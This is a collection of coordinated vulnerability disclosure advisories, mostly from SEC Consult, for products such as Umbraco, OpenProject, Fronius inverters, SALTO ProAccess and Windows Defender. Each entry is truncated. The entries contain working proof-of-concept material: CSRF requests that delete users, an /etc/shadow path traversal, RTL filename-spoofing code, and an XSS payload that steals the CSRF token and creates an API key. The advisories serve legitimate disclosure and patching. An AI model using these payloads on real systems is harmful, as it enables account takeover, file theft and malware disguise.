SEC Consult SA-20200123-0 :: Cross-Site Request Forgery (CSRF) in Umbraco CMS
SEC Consult Vulnerability Lab Security Advisory < 20200123-0 > === title: Cross-Site Request Forgery (CSRF) product: Umbraco CMS vulnerable version: version 8.2.2 fixed version: version 8.5 CVE number: CVE-2020-7210 impact: medium homepage: https://umbraco.com/ found: October 2019 by: A. Melnikova (Office Moscow) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Umbraco 8 is the latest version of Umbraco CMS. It’s the fastest and best version of Umbraco and a big step forward in regard to making your work with Umbraco simpler; simpler to extend, simpler to edit, simpler to publish - simpler to use, simpler to enjoy." Source: https://umbraco.com/products/umbraco-cms/umbraco-8/ Business recommendation: The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1) Cross-Site Request Forgery (CSRF) An attacker can use cross-site request forgery to perform arbitrary web requests with the identity of the victim, without being noticed by the victim. This attack always requires some sort of user interaction, usually the victim needs to click on an attacker-prepared link or visit a page under control of the attacker. Due to this, an attacker is able to enable/disable or delete accounts. This may lead to DoS of user accounts. Proof of concept: - 1) Cross-Site Request Forgery (CSRF) In a live attack scenario, the following HTML document would be hosted on a malicious website, controlled by the attacker. Example 1: HTML-code for disabling user: history.pushState('', '', '/') Request: POST /umbraco/backoffice/UmbracoApi/Users/PostDisableUsers?userIds= HTTP/1.1 Host: [...] Cookie: Response: - HTTP/1.1 200 OK Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Pragma: no-cache Content-Length: 112 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 1990 00:00:00 GMT Set-Cookie: Date: Wed, 06 Nov 2019 10:57:45 GMT Connection: close )]}', {"notifications":[{"header":" is now disabled","message":"","type":3}],"message":" is now disabled"} Example 2: HTML-code for enabling user: history.pushState('', '', '/') Request: POST /umbraco/backoffice/UmbracoApi/Users/PostEnableUsers?userIds= HTTP/1.1 Host: [...] Cookie: Response: - HTTP/1.1 200 OK Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Pragma: no-cache Content-Length: 110 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Wed, 06 Nov 2019 10:58:12 GMT Connection: close )]}', {"notifications":[{"header":" is now enabled","message":"","type":3}],"message":" is now enabled"} Example 3: HTML-code for deleting user: history.pushState('', '', '/') Request: POST /umbraco/backoffice/UmbracoApi/Users/PostDeleteNonLoggedInUser?id= HTTP/1.1 Host: [...] Cookie: Response: - HTTP/1.1 200 OK Cache-Control: no-store, must-revalidate, no-cache, max-age=0 Pragma: no-cache Content-Length: 114 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 1990 00:00:00 GMT Set-Cookie: Date: Wed, 06 Nov 2019 10:58:36 GMT Connection: close )]}', {"notifications":[{"header":"User was deleted","message":"","type":3}],"message":"User was deleted"} As soon as an authenticated victim (admin) visits a website with this HTML code embedded, the payload would get executed in the context of the victim's session. Although responses to these requests are not delivered to the attacker, in many cases it is sufficient to be able to compromise the integrity of the victim's information stored on the site or to perform certain, possibly compromising requests to other sites. Vulnerable / tested versions: - The following version was tested and found to be vulnerable: * version 8.2.2 Vendor contact timeline: 2019-11-13: Contacting vendor through secur...@umbraco.com. 2019-11-13: Requesting encryption keys.
SEC Consult SA-20200122-0 :: Reflected XSS in ZOHO ManageEngine ServiceDeskPlus
SEC Consult Vulnerability Lab Security Advisory < 20200122-0 > === title: Reflected XSS product: ZOHO ManageEngine ServiceDeskPlus vulnerable version: <= 11.0 Build 11007 fixed version: 11.0 Build 11010 CVE number: CVE-2020-6843 impact: medium homepage: https://www.manageengine.com/products/service-desk/ found: 2019-12-01 by: Johannes Kruchem (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike." Source: https://www.manageengine.com/products/service-desk/ Business recommendation: The vendor published a patch for ServiceDesk Plus with service pack 11010. It is recommended to install the patch with the included patcher. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Reflected Cross-Site Scripting (CVE-2020-6843) A parameter of the module called "geti18nkey" reflects unfiltered user input if it is changed. The corresponding request is frequently sent in the background if a pre-configured network scan was started. Proof of concept: - 1) Reflected Cross-Site Scripting (CVE-2020-6843) To reproduce the issue visit this URL authenticated as administrator: http://$IP:8080/CustomReportHandler.do?module=geti18nkey= How the parameter was found: 1) Authenticate as administrator and add an IP range in Admin -> Networkscan. 2) Click the "play" button next to the created IP range to start the scan. 3) To check the status of a started network scan frequent requests like "http://$IP:8080/CustomReportHandler.do?module=geti18nkey=sdp.admin.network.listview.discoverystatus.scanned=<%someUUID%>" are sent to the server. 4) The value of the "key" parameter will be reflected if you change a single character. The "sdpcsrfparam" isn't needed in order to trigger the XSS. 5) XSS can thus be exploited by calling "http://$IP:8080/CustomReportHandler.do?module=geti18nkey=" Vulnerable / tested versions: - The following versions have been tested which were the latest versions available at the time of the test: - 10.5 - 11.0 Build 11007 Vendor contact timeline: 2019-12-05: Contacting vendor through ManageEngine Security Response Center (MESRC) Uploaded security advisory to bugbounty.zoho.com 2019-12-09: Vendor promised to fix the vulnerability. 2020-01-08: Reported issue has been fixed in service pack 11010. 2020-01-22: Public release of security advisory. Solution: - The vendor provides an updated version which should be installed immediately. https://www.manageengine.com/products/service-desk/download.html The vendor also provided a link to their readme about the new release: https://www.manageengine.com/products/service-desk/readme.html#11010 Workaround: ------- None Advisory URL: - https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~
Deutsche Bahn Ticket Vending Machine Windows XP - Local Kiosk Privilege Escalation Vulnerability
ine (editor / debugger / cmd / ps - exp. ransomware/malware) 2. Local manipulation for skimming devices to assist (transmit prepares) 2. Phishing of local credentials from screen via system (db browser application) 3. Intercept or manipulation to access card information (local file system - sniff/extract) 4. Crash or freeze the computer system (exp. kill of process / loop script) 5. Scare or joké activities (exp. html / js to front screens with web browser or by a new window process) Refernece(s): https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6457.JPG https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6458.JPG https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/IMG_6460.JPG Solution - Fix & Patch: === There are now several problems related to system hardening that can be resolved: 1. It should not be possible for users with system user rights to use the web browsers 2. The error message menu can be deactivated or completely modified 3. Some functions in menus can be deactivated by hardening (browser, messages & Co.) 4. Check that all other tasks are always running in the background or are being moved there permanently 5. The deutsche bahn vending machine application and user interface should be shut down in the event of persistent errors in the foreground 6. The activities of the testing has been logged but did not triggered any alert for defense purpose Deutsche Bahn: Patch Rollout in Progress https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/073915298_0.png https://www.vulnerability-db.com/sites/default/files//newscenter-gallery/dbatm78235.png Security Risk: == The security risk of the local ticket vending machine system vulnerability is estimated as high. The bug to escalate can be easily exploited by local interaction with the touch display to access the file system. Credits & Authors: == Benjamin K.M. - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: = The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_labfacebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
SEC Consult SA-20191211-0 :: File Extension Spoofing in Windows Defender Antivirus
SEC Consult Vulnerability Lab Security Advisory < 20191211-0 > === title: File Extension Spoofing product: Windows Defender Antivirus vulnerable version: 4.18.1908.7-0 fixed version: Virus Definition Update of 2019/09/30 CVE number: - impact: High homepage: https://www.microsoft.com/de-at/windows/comprehensive-security found: 2019-09-25 by: David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "Keep your PC safe with trusted antivirus protection built-in to Windows 10. Windows Defender Antivirus delivers comprehensive, ongoing and real-time protection against software threats like viruses, malware and spyware across email, apps, the cloud and the web." Source: https://www.microsoft.com/de-at/windows/comprehensive-security Business recommendation: Update to the latest version of the Windows Defender Antivirus definitions. Vulnerability overview/description: --- The vulnerability is based on the file extension spoofing method using the RTL unicode character to display a spoofed file extension. This method uses the LTR unicode character, that instructs the following text to be shown in left-to-right order. Lets assume [LTR] is the LTR unicode character, an attacker can use this unicode character to fool a user into believing that a file has a different extension. For example an attacker may name an executable file (.exe) 'spoofed-[LTR]gpj.exe', which would be displayed as 'spoofed-exe.jpg' on an LTR-based system. The most important point here is to have the extension you want to be shown in reverse order, since it will be shown right-to-left. Combined with the right file icon, an attacker can imitate an arbitrary file extension. Same goes for other extensions too, like 'xlsx' for a Microsoft Excel Sheet. During testing it happened that 'xlsx' was typed in the wrong order ('xslx' instead of 'xlsx' since reverse order) and Windows Defender Antivirus removed the test file while we tried to execute it. As a result, two files were created, with the exact same executable but with different fake extensions: 1. spoofed-[RTL]xslx.exe (displayed as 'spoofed-exe.xlsx') 2. spoofed-[RTL]xlsx.exe (displayed as 'spoofed-exe.xslx') The second one was deleted, while the first one could be executed without any problem. Therefore, other extensions related to Microsoft Office were tested as well, but it seems only the xlsx extension had a detection for it. While the security issue of spoofing the file extension by using the RTL unicode character (on RTL systems it is the same just with LTR) is widely known, it seems to be unknown that Microsoft already started to add detection mechanisms for this issue. But since it is not implemented for all extensions and it seems to be implemented in the wrong order, this feature is mostly unknown. Proof of concept: - For the proof of concept a file has to be renamed in Unicode mode using the Unicode character '202E' ('\u202E' in C), which stands for RTL. The sample code is written in C/C++ and uses the unicode API of Windows. A Python PoC has been made as well. C/C++: #include int main(int argc, char** argv) { wchar_t opath[] = L"test.exe"; wchar_t npath_ok[] = L"spoofed-\u202Exslx.exe"; // String for filename 'spoofed-exe.xlsx' wchar_t npath_wrong[] = L"spoofed-\u202Exlsx.exe"; // String for filename 'spoofed-exe.xslx' // Copy 'test.exe' to file shown as 'spoofed-exe.xlsx' CopyFileW(opath, npath_ok, false); // Copy 'test.exe' to file shown as 'spoofed-exe.xslx' CopyFileW(opath, npath_wrong, false); } Python: from shutil import copyfile opath = "test.exe" npath_ok = "spoofed-\u202Exslx.exe" # String for filename 'spoofed-exe.xlsx' npath_wrong = "spoofed-\u202Exlsx.exe" # String for filename 'spoofed-exe.xslx' # Copy 'test.exe' to file shown as 'spoofed-exe.xlsx' copyfile(opath, npath_ok) # Copy 'test.exe' to file shown as 'spoofed-exe.xslx' copyfile(opath, npath_wrong) There will be two new files after the execution (as long as 'test.exe' exists) and the file shown as 'spoofed-exe.xslx' will be deleted while trying to execute (or earlier) as shown in figure 1. [ win-defender-ext-spoofing1.png ] Figure 1: File gets deleted by Windows Defender Antivirus. But the file shown as 'spoofed-exe.xlsx' will be executed without any problem. [ win-defender-ext-spo
SEC Consult SA-20191203-0 :: Multiple vulnerabilites in Fronius Solar Inverter Series
SEC Consult Vulnerability Lab Security Advisory < 20191203-0 > === title: Multiple vulnerabilites product: Fronius Solar Inverter Series vulnerable version: SW Version <3.14.1 (HM 1.12.1) fixed version: >=3.14.1 (vuln 2: 3.12.5 - HM 1.10.5), see solution section below CVE number: CVE-2019-19228, CVE-2019-19229 impact: High homepage: https://www.fronius.com found: 2018-10-31 by: T. Weber (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "A passion for new technologies, intensive research and revolutionary solutions have been shaping the Fronius brand since 1945. As the technology leader, we find, develop and implement innovative methods to monitor and control energy for welding technology, photovoltaics and battery charging. We forge new paths, try something difficult and succeed where others have failed in achieving what seems to be impossible. [...]" Source: http://www.fronius.com/en/about-fronius/company-values Business recommendation: The vendor automatically performed a fleet update of the solar inverters in the field in order to patch them. Nevertheless, as not all devices could be reached through such an update, all remaining users are advised to install the patches provided by the vendor immediately. Vulnerability overview/description: --- 1) Unencrypted Communication The whole communication is handled over HTTP. There is no possibility to activate an HTTPS web service. This vulnerability cannot be fixed by the vendor in the current solar inverter generation, see the workaround section below. 2) Authenticated Path Traversal (CVE-2019-19229) A path traversal attack for authenticated users is possible. This allows getting access to the operating system of the device and access information like network configurations and connections to other hosts or potentially other sensitive information. This vulnerability has been fixed in March 2019 in version 3.12.5. (HM 1.10.5). The web server runs with "nobody" privileges, but nearly all files on the file system are world-readable and can be extracted. This can be seen as another vulnerability but according to the vendor this cannot be fixed in the current solar inverter generation. 3) Backdoor Account (CVE-2019-19228) The web interface has a backdoor user account with the username "today". This user account has all permissions of all other users ("service", "admin" and "user") together. As its name suggests, the password for the user "today" changes every day and seems to be different to other devices with the same firmware. This means that some device-specific strings (e.g. the public device-ID) is mixed up every day to generate a new password. This account is being used by Fronius support in order to access the device upon request from the user. The fix for this issue has been split in two parts. The "password reset" part has been fixed in version 3.14.1 (HM 1.12.1) and the second part providing the support account needs an architectural rework which will be fixed in a future version (planned for 3.15.1 (HM 1.15.1)). The passwords for all users of the web interface are stored in plain-text. This can be seen as another vulnerability and it has been fixed in version 3.14.1 (HM 1.12.1). 4) Outdated and Vulnerable Software Components Outdated and vulnerable software components were found on the device during a quick examination. Not all of the outdated components can be fixed by the vendor in the current solar inverter generation, see the workaround section below. Proof of concept: - 1) Unencrypted Communication By using an interceptor proxy this vulnerability can be verified in a simple way. 2) Authenticated Path Traversal (CVE-2019-19229) By sending the following request to the following endpoint, a path traversal vulnerability can be triggered: http:///admincgi-bin/service.fcgi Request to read the "/etc/shadow" password file: ┌── |GET /admincgi-bin/service.fcgi?action=download=../../../../../etc/shadow └── As response, the file is returned without line breaks. In this example the line breaks are added for better readability: ┌── |HTTP/1.1 200 OK |Content-Type: appli
SEC Consult SA-20191202-0 :: Multiple Critical Vulnerabilities in SALTO ProAccess SPACE
SEC Consult Vulnerability Lab Security Advisory < 20191202-0 > === title: Multiple Critical Vulnerabilities product: SALTO ProAccess SPACE vulnerable version: <= v5.5 fixed version: >= v5.6 CVE number: CVE-2019-19457, CVE-2019-19458, CVE-2019-19459, CVE-2019-19460 impact: critical homepage: https://www.saltosystems.com/en/ found: 2019-05-22 by: Werner Schober (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "SALTO ProAccess SPACE Software is a powerful access control management tool that enables you to program access time zones for each user, manage different calendars and obtain audit trails from each door to see who has passed through it. The software includes special functions such as automatic door status changes, anti-passback and relay management. Thanks to its advanced software features, SALTO ProAccess SPACE is also one of the most user-friendly and powerful software products for the access control management of stand-alone wireless devices, and IP online devices in one converged complete access control platform for the user, keys and doors management." Source: http://proaccess-space.saltosystems.com/features/ Business recommendation: The vendor provides a patch which should be installed immediately. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve all security issues. Vulnerability overview/description: --- 1. Path Traversal (CVE-2019-19458) Path traversal vulnerabilities allow attackers access to files and directories outside the application root through relative file paths in the user input. During a quick security check, multiple locations in the web application were identified, which allow an attacker to traverse outside of the application root. The vulnerabilities got identified in the "Data Export" as well as "Database Export" functionality. Those vulnerabilities can for example be used to dump the whole database into the web root, by traversing outside of the application root. 2. Arbitrary File Write (CVE-2019-19459) By further exploiting the path traversal vulnerability inside of the "Data Export" feature, an attacker is able to traverse into arbitrary paths and write arbitrary files with arbitrary contents. Some examples are files to the web root, or bat files into auto start. This allows an attacker to execute arbitrary commands on the server. 3. Stored Cross-Site-Scripting (CVE-2019-19457) By adding devices to the SALTO network with a JavaScript payload inside of certain parameters, an attacker is able to permanently embed arbitrary JavaScript payloads inside of the web application. 4. Webserver running as SYSTEM (Windows Service) per Default (CVE-2019-19460) The webserver of the SALTO ProAccess SPACE is running as a Windows Service with local SYSTEM permissions per default. This is against the principle of least privilege. An attacker, who is able to exploit the path traversal, or arbitrary file write vulnerability, is basically able to write to every single path on the file system, because the webserver is running with the highest privileges available. 5. Authorization Issues Multiple API calls were identified in the SALTO ProAccess SPACE web application, that could normally only be called by high privileged users. Nevertheless, by directly calling the API with the OAuth token of a low privileged user, it was possible to call some API calls that shouldn't be available to them. 6. Cleartext transmission of sensitive data The SALTO ProAccess SPACE web application allows their users to create so called event streams. Those streams can be used to log events centrally. The stream is transmitted via TCP/UDP in JSON, or CSV format. The stream is transmitted in cleartext and leaks sensitive data such as who opened which door and when including card ids etc. Proof of concept: - 1. Path Traversal (CVE-2019-19458) The "Data Export" as well as the "Database Export" features in SALTO ProAccess SPACE allow users to specify a filename for the different exports. By using special characters inside of the filename, an attacker is able to traverse outside of the designated export path and place the exports in arbitrary locations. For example, the following filename can be used in the database export to store the database backup inside of the webroot: ..\..\..\..\SALTO\ProAccess Space\bin\webapp\backup.
Re: SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
Hi, we received incorrect version information during the coordination phase thus our initial advisory stated that FortiOS v6.0.7 fixes the issue. Fortinet has just now confirmed that only v6.2.0 includes the patch. See their advisory: https://fortiguard.com/psirt/FG-IR-18-100 SEC Consult Vulnerability Lab On 25.11.19 14:43, SEC Consult Vulnerability Lab wrote: > SEC Consult Vulnerability Lab Security Advisory < 20191125-0 > > === > title: FortiGuard XOR Encryption > product: Multiple Fortinet Products (see Vulnerable / tested > versions) > vulnerable version: Multiple (see Vulnerable / tested versions) > fixed version: Multiple (see Solution) > CVE number: CVE-2018-9195 > impact: High >homepage: https://www.fortinet.com > found: 2018-05-16 > > by: Stefan Viehböck (Office Vienna) > SEC Consult Vulnerability Lab > > An integrated part of SEC Consult > Europe | Asia | North America > > https://www.sec-consult.com > > === > > Vendor description: > --- > "From the start, the Fortinet vision has been to deliver broad, truly > integrated, high-performance security across the IT infrastructure. > > We provide top-rated network and content security, as well as secure access > products that share intelligence and work together to form a cooperative > fabric. Our unique security fabric combines Security Processors, an intuitive > operating system, and applied threat intelligence to give you proven security, > exceptional performance, and better visibility and control--while providing > easier administration." > > Source: https://www.fortinet.com/corporate/about-us/about-us.html > > > Business recommendation: > > The vendor provides a patch and users of affected products are urged to > immediately upgrade to the latest version available. > > > Vulnerability overview/description: > --- > Fortinet products, including FortiGate and Forticlient regularly send > information to Fortinet servers (DNS: guard.fortinet.com) on > - UDP ports 53, and > - TCP port 80 (HTTP POST /fgdsvc) > > This cloud communication is used for the FortiGuard Web Filter feature > (https://fortiguard.com/webfilter), > FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam) > and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus). > > The messages are encrypted using XOR "encryption" with a static key. > > > The protocol messages contain the following types of information: > > **Serial number of the Fortinet product installation** (product type + unique > ID). > This information allows an attacker who can **passively monitor** internet > traffic to: > - learn which Fortinet products and product types an organization uses > (this is valuable for information gathering, see EquationGroup Fortigate > exploits) > - learn which FortiClient installations are part of an organization > - use the FortiClient serial number as a unique identifier to track an > individual as > he/she travels the world > > > **Full HTTP URLs of users web surfing activity** (Web Filter feature). > This information allows an attacker who can **passively monitor** internet > traffic > to spy on users' web surfing activity. In cases where SSL inspection is > enabled, > even the URLs of HTTPS-encrypted communication are sent via this protocol, > effectively breaking the confidentiality of SSL/TLS. > > > **Unspecified email data** (AntiSpam feature). > We do not have any further information on what kind of information is sent by > the > AntiSpam feature. > > > **Unspecified AntiVirus data** (AntiVirus feature). > We do not have any further information on what kind of information is sent by > the > AntiVirus feature. > > > By **intercepting and manipulating** internet traffic an attacker can: > Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus > features. > > > Proof of concept: > - > The following Python 3 script decrypts a FortiGuard message (the static XOR > key > has been removed from this advisory). > > > ```python > from itertools import cycle > > def forti_xor(s1): > xor_key = **removed** > message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key))) > return message > > r1=bytes.f
SEC Consult SA-20191125-0 :: FortiGuard XOR Encryption in Multiple Fortinet Products
SEC Consult Vulnerability Lab Security Advisory < 20191125-0 > === title: FortiGuard XOR Encryption product: Multiple Fortinet Products (see Vulnerable / tested versions) vulnerable version: Multiple (see Vulnerable / tested versions) fixed version: Multiple (see Solution) CVE number: CVE-2018-9195 impact: High homepage: https://www.fortinet.com found: 2018-05-16 by: Stefan Viehböck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "From the start, the Fortinet vision has been to deliver broad, truly integrated, high-performance security across the IT infrastructure. We provide top-rated network and content security, as well as secure access products that share intelligence and work together to form a cooperative fabric. Our unique security fabric combines Security Processors, an intuitive operating system, and applied threat intelligence to give you proven security, exceptional performance, and better visibility and control--while providing easier administration." Source: https://www.fortinet.com/corporate/about-us/about-us.html Business recommendation: The vendor provides a patch and users of affected products are urged to immediately upgrade to the latest version available. Vulnerability overview/description: --- Fortinet products, including FortiGate and Forticlient regularly send information to Fortinet servers (DNS: guard.fortinet.com) on - UDP ports 53, and - TCP port 80 (HTTP POST /fgdsvc) This cloud communication is used for the FortiGuard Web Filter feature (https://fortiguard.com/webfilter), FortiGuard AntiSpam feature (https://fortiguard.com/updates/antispam) and FortiGuard AntiVirus feature (https://fortiguard.com/updates/antivirus). The messages are encrypted using XOR "encryption" with a static key. The protocol messages contain the following types of information: **Serial number of the Fortinet product installation** (product type + unique ID). This information allows an attacker who can **passively monitor** internet traffic to: - learn which Fortinet products and product types an organization uses (this is valuable for information gathering, see EquationGroup Fortigate exploits) - learn which FortiClient installations are part of an organization - use the FortiClient serial number as a unique identifier to track an individual as he/she travels the world **Full HTTP URLs of users web surfing activity** (Web Filter feature). This information allows an attacker who can **passively monitor** internet traffic to spy on users' web surfing activity. In cases where SSL inspection is enabled, even the URLs of HTTPS-encrypted communication are sent via this protocol, effectively breaking the confidentiality of SSL/TLS. **Unspecified email data** (AntiSpam feature). We do not have any further information on what kind of information is sent by the AntiSpam feature. **Unspecified AntiVirus data** (AntiVirus feature). We do not have any further information on what kind of information is sent by the AntiVirus feature. By **intercepting and manipulating** internet traffic an attacker can: Manipulate the responses for FortiGuard Web Filter, AntiSpam and AntiVirus features. Proof of concept: - The following Python 3 script decrypts a FortiGuard message (the static XOR key has been removed from this advisory). ```python from itertools import cycle def forti_xor(s1): xor_key = **removed** message = ''.join(chr(c ^ k) for c, k in zip(s1, cycle(xor_key))) return message r1=bytes.fromhex('6968766f606e776c2d2d21262138475c5b5a475b545e475c6b6a776b646e776c6b6a772b646e776c6b6a776b646e776c6b6a776bbadf04036b6a776c616a846f') print(repr(forti_xor(r1))) ``` In this case the encrypted message contents are: '\x02\x02\x01\x04\x04\x00\x00\x00FGVMEV00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00...' Another example: '\x02\x01\x02\x04úI\x03\x00FG100D3G\x00\x00\...x00\x00+https://v10.vortex-win.data.microsoft.com/\x00' Vulnerable / tested versions: - The following FortiOS versions are affected according to the vendor: * FortiOS 6.0.6 and below * FortiClientWindows 6.0.6 and below * FortiClientMac 6.2.1 and below The security advisory of the vendor can be found at: https://fortiguard.com/psirt/FG-IR-18-100 Vendor contact timeline: 2018-05-17: Contacting vendor through ps...@fortinet.com, sending advisory with publi
SEC Consult SA-20191014-0 :: Reflected XSS vulnerability in OpenProject
SEC Consult Vulnerability Lab Security Advisory < 20191014-0 > === title: Reflected XSS vulnerability product: OpenProject vulnerable version: <= 9.0.3, <=10.0.1 fixed version: 9.0.4, 10.0.2 CVE number: CVE-2019-17092 impact: medium homepage: https://www.openproject.org found: 2019-09-27 by: David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "OpenProject is the leading open source project management software. Support your project management process along the entire project life cycle: From project initiation to closure." Source: https://www.openproject.org/ Business recommendation: Update to the latest version of OpenProject. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Reflected XSS vulnerability (CVE-2019-17092) The project list of OpenProject lacks input validation on data that is output inside an error message. Due to the Content Security Policy inline scripts/styles weren't allowed and the script source was limited to 'self'. To bypass this a JavaScript file was added as attachment to an existing project. This could be used to extract the CSRF token and create a new API key. Proof of concept: - 1) Reflected XSS vulnerability (CVE-2019-17092) Within this proof of concept, two steps are done. First the JavaScript code to be executed is uploaded as an attachment to fulfill the Content Security Policy of 'self'. In the second step the uploaded JavaScript code is executed through the reflected XSS vulnerability by using a script-tag. a) Upload JavaScript code An attacker can upload a JavaScript file as attachment into any project in the default configuration. The attachment can be called directly, but will be downloaded automatically. But since the browser doesn't care if a file shall be downloaded or displayed when loading it from an src-property, an attacker can easily use it for the reflected XSS vulnerability. In this proof of concept the following JavaScript code was uploaded: (async () => { var csrf_param = document.querySelector('meta[name=csrf-param]').content; var csrf_token = document.querySelector('meta[name=csrf-token]').content; var req = await fetch("http://$IP/my/generate_api_key;, { "credentials": "include", "headers": { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Content-Type": "application/x-www-form-urlencoded", "Upgrade-Insecure-Requests": "1" }, "referrer": "http://$IP/my/access_token;, "body": "_method=post&" + csrf_param + "=" + encodeURI(csrf_token), "method": "POST", "mode": "cors" }); var resp = await req.text(); var regex = /(Your access token is:\\)(.*)(\<\/strong\>)/gm; var api_key = resp.match(regex)[0]; api_key = api_key.slice(35, -9); alert("Generated new API key: " + api_key); })(); This gets the CSRF token and the parameter name (since this seems to be configurable) and sends a request to the generate_api_key functionality. After parsing, the key is exposed in a message box, but can be used for further operations like adding an administrative user. b) Craft link The reflected XSS vulnerability was found in the URL parameter 'sortBy' of the path '/projects'. There an attacker may add any HTML code. Such a link could be: http://$IP/projects?sortBy=[[%22%3E%3Cscript%20src=%27/attachments/29/test.js%27%3E%3C%2Fscript%3E%22%2C%22%22]] Vulnerable / tested versions: - The following version has been tested which was the latest version available at the time of the test: * 10.0.0 * 10.0.1 According to the vendor, all versions before v9.0.3 and v10.0.1 are affected. Vendor contact timeline: 2019-10-02: Contacting vendor through secur...@openproject.com 2019-10-02: Vendor verified the vulnerabili
SEC Consult SA-20190926-0 :: Multiple SQL Injection vulnerabilities in eBrigade
SEC Consult Vulnerability Lab Security Advisory < 20190926-0 > === title: Multiple SQL Injection vulnerabilities product: eBrigade vulnerable version: <5.0 fixed version: >=5.0 CVE number: CVE-2019-16743, CVE-2019-16744, CVE-2019-16745 impact: critical homepage: https://ebrigade.net found: 2019-06-06 by: D. Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com === Vendor description: --- "eBrigade is a web application that allows the management of personnel, vehicles and equipment of rescue centers (fire brigades), associations of first responders and military organizations. Highly configurable, eBrigade can meet the expectations of many other organizations. Skills management, generation of the cover sheet according to availability. Management of the interventions and the victims with assessment sheets rescuers. Private social network. Notifications and alerts by email and SMS. Accounting, reporting and numerous graphs allow precise monitoring of the organization." (translated) Source: https://ebrigade.net/ Business recommendation: The vendor provides a patch and users of this product are urged to immediately upgrade to the latest version available. An in-depth security analysis performed by security professionals is highly advised, as the software may be affected from further security issues. Vulnerability overview/description: --- 1) Multiple SQL Injection vulnerabilities Due to insufficient sanitization of user input an authenticated attacker can execute arbitrary SQL code in several SELECT statements. Since two of the three vulnerabilities are completely unsanitized and responsible to serve ICAL files, an attacker can let a user download manipulated calendar files. Besides that an attacker can also dump the whole database. The third vulnerability results out of wrong usage of sanitization functions. This enables an attacker to 